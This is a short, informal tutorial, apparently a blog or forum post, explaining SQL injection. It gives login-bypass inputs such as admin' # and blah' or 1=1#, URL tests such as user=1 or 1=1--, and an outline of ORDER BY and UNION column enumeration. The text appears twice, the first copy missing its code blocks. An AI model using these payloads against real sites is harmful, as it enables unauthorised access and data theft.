***How Sqli Works****
% Mental Mind %
It's just an short article to show you how sql injection exploits works, It will just an overview,
* I will start from a little login exploit first have a look at sql vulnerable login statement :
suppose we know the username is "admin" but dont know the password and then First thing we will try to do that we will try to comment out the password
comments symbols in sql= # OR --
we will try to put this command
username = admin' #
password = blah
what will it do?
Ans = Doing this the sql statement will become
#this is comment line
'#' This sign will commented out the password and the statment will chek username if it's admin then it will allow you to access to DB
* Next part is let's try to put the The following username and password
what will it do?
Ans = it will convert the statment as follow:
Here what happened?
The statement will chek username =admin it's true
know it wll chek password = blah
which is wrong but we have used logical operator 'or' and comment symbol '#'
what will they do..!! it will work something like this
"If password == blah OR password = true"
And '#' will commented out the ' single qoute sign and because of this 1=1 become and second statement and as you know 1=1 is always true and it will allow you to access to the DB
*Another way to do that we will use the following Command
The statemenr will become:
Same A = A is always true like 1=1
*Extracting Database
Lets Have a look at vulnerable statement of database:
suppose the url is:
site.com/showprofile&user=1
We will put vulnerable test variable in url bar we will put "or 1=1--" after "user=1"
the statement will become:
-- is another comment operator but if it's use at end of statment it's tell the statement to return the data of user,
here we are using user=1
if by using this command
site.com/showprofile&user=1 or 1=1--
if you see any data changes in web page then our vlnerablity test was succesfull.
"data changes mean it will show the all posts by every user"
* second Vulneable test
or 1=0--
The statment will become
if by using this you see no posts then our vulnerable test was succesfull
* Ok now if vulnerability test was succesfull then enter an unexpected to retrieve information on sql statement,
for example if sever expects an integer then put character
for example here at
user=""
after this server expects an integer for example it expects user = 1
user = 100 and so on,
but its not expected character here so if you put ' character at he end of url, the statement will give eror mesage like:
mysql_warning or you have an eror blah blah blah
AND then your egular using commands like:
order by # = will use to get column column count
union = combines the result of two different queries into single output, the two queries must have same number of columns in order to join,
suppose by using order by clause you got 7 tabls and then eror message
then we will use union slect to combine the all columns and get vulnerable column,
but goal of this tutorial was just to show you demonstartion that how sql works it was just a basic demo
sorry for my bad english
remember me in your prayers
ALLAH HAFIZ
% Mental Mind %
It's just an short article to show you how sql injection exploits works, It will just an overview,
* I will start from a little login exploit first have a look at sql vulnerable login statement :
Code:
SELECT * FROM TABLE WHERE USERNAME='$_POST['username']' AND PASSWORD='$_POST['password']'suppose we know the username is "admin" but dont know the password and then First thing we will try to do that we will try to comment out the password
comments symbols in sql= # OR --
we will try to put this command
username = admin' #
password = blah
what will it do?
Ans = Doing this the sql statement will become
Code:
SELECT * FROM TABLE WHERE USERNAME = 'ADMIN' # AND PASSWORD = 'BLAH'#this is comment line
'#' This sign will commented out the password and the statment will chek username if it's admin then it will allow you to access to DB
* Next part is let's try to put the The following username and password
Code:
Username = admin
password = blah' or 1=1#what will it do?
Ans = it will convert the statment as follow:
Code:
SELECT * FROM TABLE WHERE USERNAME='$_POST['username']' AND PASSWORD='blah' OR 1=1#'Here what happened?
The statement will chek username =admin it's true
know it wll chek password = blah
which is wrong but we have used logical operator 'or' and comment symbol '#'
what will they do..!! it will work something like this
"If password == blah OR password = true"
And '#' will commented out the ' single qoute sign and because of this 1=1 become and second statement and as you know 1=1 is always true and it will allow you to access to the DB
*Another way to do that we will use the following Command
Code:
username = admin
password = blah' OR 'A'='AThe statemenr will become:
Code:
SELECT * FROM TABLE WHERE USERNAME='$_POST['username']' AND PASSWORD='blah' OR 'A' = 'A'Same A = A is always true like 1=1
*Extracting Database
Lets Have a look at vulnerable statement of database:
Code:
SELECT * FROM TABLE WHERE USER =1suppose the url is:
site.com/showprofile&user=1
We will put vulnerable test variable in url bar we will put "or 1=1--" after "user=1"
the statement will become:
Code:
SELECT * FROM TABLE WHERE USER =1 or 1=1---- is another comment operator but if it's use at end of statment it's tell the statement to return the data of user,
here we are using user=1
if by using this command
site.com/showprofile&user=1 or 1=1--
if you see any data changes in web page then our vlnerablity test was succesfull.
"data changes mean it will show the all posts by every user"
* second Vulneable test
or 1=0--
The statment will become
Code:
SELECT * FROM TABLE WHERE USER =1 or 1=0--if by using this you see no posts then our vulnerable test was succesfull
* Ok now if vulnerability test was succesfull then enter an unexpected to retrieve information on sql statement,
for example if sever expects an integer then put character
for example here at
user=""
after this server expects an integer for example it expects user = 1
user = 100 and so on,
but its not expected character here so if you put ' character at he end of url, the statement will give eror mesage like:
mysql_warning or you have an eror blah blah blah
AND then your egular using commands like:
order by # = will use to get column column count
union = combines the result of two different queries into single output, the two queries must have same number of columns in order to join,
suppose by using order by clause you got 7 tabls and then eror message
then we will use union slect to combine the all columns and get vulnerable column,
but goal of this tutorial was just to show you demonstartion that how sql works it was just a basic demo
sorry for my bad english
remember me in your prayers
ALLAH HAFIZ
Post a Comment